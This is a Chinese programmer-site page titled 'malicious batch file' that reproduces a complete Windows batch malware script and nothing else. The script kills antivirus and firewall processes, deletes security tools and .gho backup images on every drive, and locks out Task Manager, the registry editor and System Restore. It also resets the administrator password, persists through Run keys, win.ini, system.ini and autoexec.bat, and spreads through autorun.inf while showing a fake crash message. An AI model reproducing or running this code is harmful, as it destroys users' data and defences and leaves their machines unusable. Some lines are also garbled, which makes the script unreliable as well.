欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

恶意批处理.bat

程序员文章站 2022-05-15 11:26:00
@echo off title you dead!!!!!!! set taskkill=s copy %0 %...
@echo off
title you dead!!!!!!!
set taskkill=s
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe iexolore.exe /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im persfw /f >nul
%s% /im kav* /f >nul
%s% /im zonealarm /f >nul
%s% /im safeweb /f >nul
%s% /im outpost /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im f-* /f >nul
%s% /im esafe /f >nul
%s% /im cle /f >nul
%s% /im blackice /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
net stop shadow" "system" "service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nul
rem 修改注册表.......
reg add hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall /v 
checkedvalue /t reg_dword /d 00000000 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v norun /t reg_dword /d 
00000001 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v norecentdocsmenu /t 
reg_dword /d 00000001 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nodrives /t reg_dword /d 
4294967295 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t 
reg_dword /d 00000002 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nonethood /t reg_dword /d 
00000001 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nodesktop /t reg_dword /d 
00000001 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v noclose /t reg_dword /d 
00000001 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nofind /t reg_dword /d 
00000001 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword 
/d 00000001 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nologoff /t reg_dword /d 
00000001 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v nosettaskbar /t reg_dword 
/d 00000001 /f >nul
reg add hkey_local_machine\software\microsoft\windows" "nt\currentversion\systemrestore /v disablesr /t reg_dword /d 
00000001 /f >nul
reg add hkey_local_machine\software\policies\microsoft\windows" "nt\systemrestore /v disableconfig /t reg_dword /d 
00000001 /f >nul
reg add hkey_current_user\software\microsoft\windows\currentversion\policies\explorer /v restrictrun /t reg_dword /d 
00000001 /f >nul
cls
net user administrator 123456 >nul
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新安装系统可以解决此问题
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\documents" "and" "settings\all" "users\「开始」菜单\程序\启动\a.bat >>d:\setup.bat
echo reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v setup.bat /t reg_sz /d d:\setup.bat 
/f >>d:\setup.bat
echo reg add hkey_current_user\software\microsoft\windows\currentversion\run /v setup.bat /t reg_sz /d d:\setup.bat 
/f >>d:\setup.bat
echo reg add hkey_local_machine\software\microsoft\windows\currentversion\runonce /v setup.bat /t reg_sz /d d:\setup.bat 
/f >>d:\setup.bat
hkey_classes_root\batfile\shell\open\command /v setup.bat /t reg_sz /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat c:\autoexec.bat >> %windir%\win.ini
echo load=d:\setup.bat c:\autoexec.bat >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat c:\autoexec.bat >> %windir%\system.ini
echo [autorun] >d:\autorun.inf
echo open=setup.bat >>d:\autorun.inf
echo open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf +r +s +h >>d:\setup.bat
attrib d:\setup.bat +r +s +h >>d:\setup.bat
start d:\setup.bat /min >nul
echo @echo off >>c:\autoexec.bat
echo reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v autoexec.bat /t reg_sz /d 
c:\autoexec.bat /f >>c:\autoexec.bat
echo reg add hkey_current_user\software\microsoft\windows\currentversion\run /v autoexec.bat /t reg_sz /d 
c:\autoexec.bat /f >>c:\autoexec.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\runonce /v autoexec.bat /t reg_sz /d 
c:\autoexec.bat /f >>c:\autoexec.bat
echo reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v setup.bat /t reg_sz /d d:\setup.bat 
/f >>c:\autoexec.bat
echo reg add hkey_current_user\software\microsoft\windows\currentversion\run /v setup.bat /t reg_sz /d d:\setup.bat 
/f >>c:\autoexec.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\runonce /v setup.bat /t reg_sz /d d:\setup.bat 
/f >>c:\autoexec.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>c:\autoexec.bat
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist c:\autoexec.bat start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
echo reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v autoexec.bat /t reg_sz /d 
c:\autoexec.bat /f >>%windir%/system32/explorer.bat
echo reg add hkey_current_user\software\microsoft\windows\currentversion\run /v autoexec.bat /t reg_sz /d 
c:\autoexec.bat /f >>%windir%/system32/explorer.bat
echo reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v setup.bat /t reg_sz /d d:\setup.bat 
/f >>%windir%/system32/explorer.bat
echo reg add hkey_current_user\software\microsoft\windows\currentversion\run /v setup.bat /t reg_sz /d d:\setup.bat 
/f >>%windir%/system32/explorer.bat
echo reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v explorer.bat /t reg_sz /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo reg add hkey_current_user\software\microsoft\windows\currentversion\run /v explorer.bat /t reg_sz /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat +r +s +h%
attrib %systemroot%/windows.bat +r +s +h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.bat
set drive=e f g h i j k l m n o p q r s t u v w x y z
for %%c in (%drive%) do echo [aurorun] >%%c:\autorun.inf
for %%c in (%drive%) do echo open=system.bat >>%%c:\autorun.inf
copy %0 d:\program" "files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\program" "files\run.bat /min 
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nul
if not exist %windir%/system32/explorer.bat start d:\program" "files\run.bat /min >>d:\setup.bat
attrib d:\program" "files\run.bat +r +s +h >nul
del %0
exit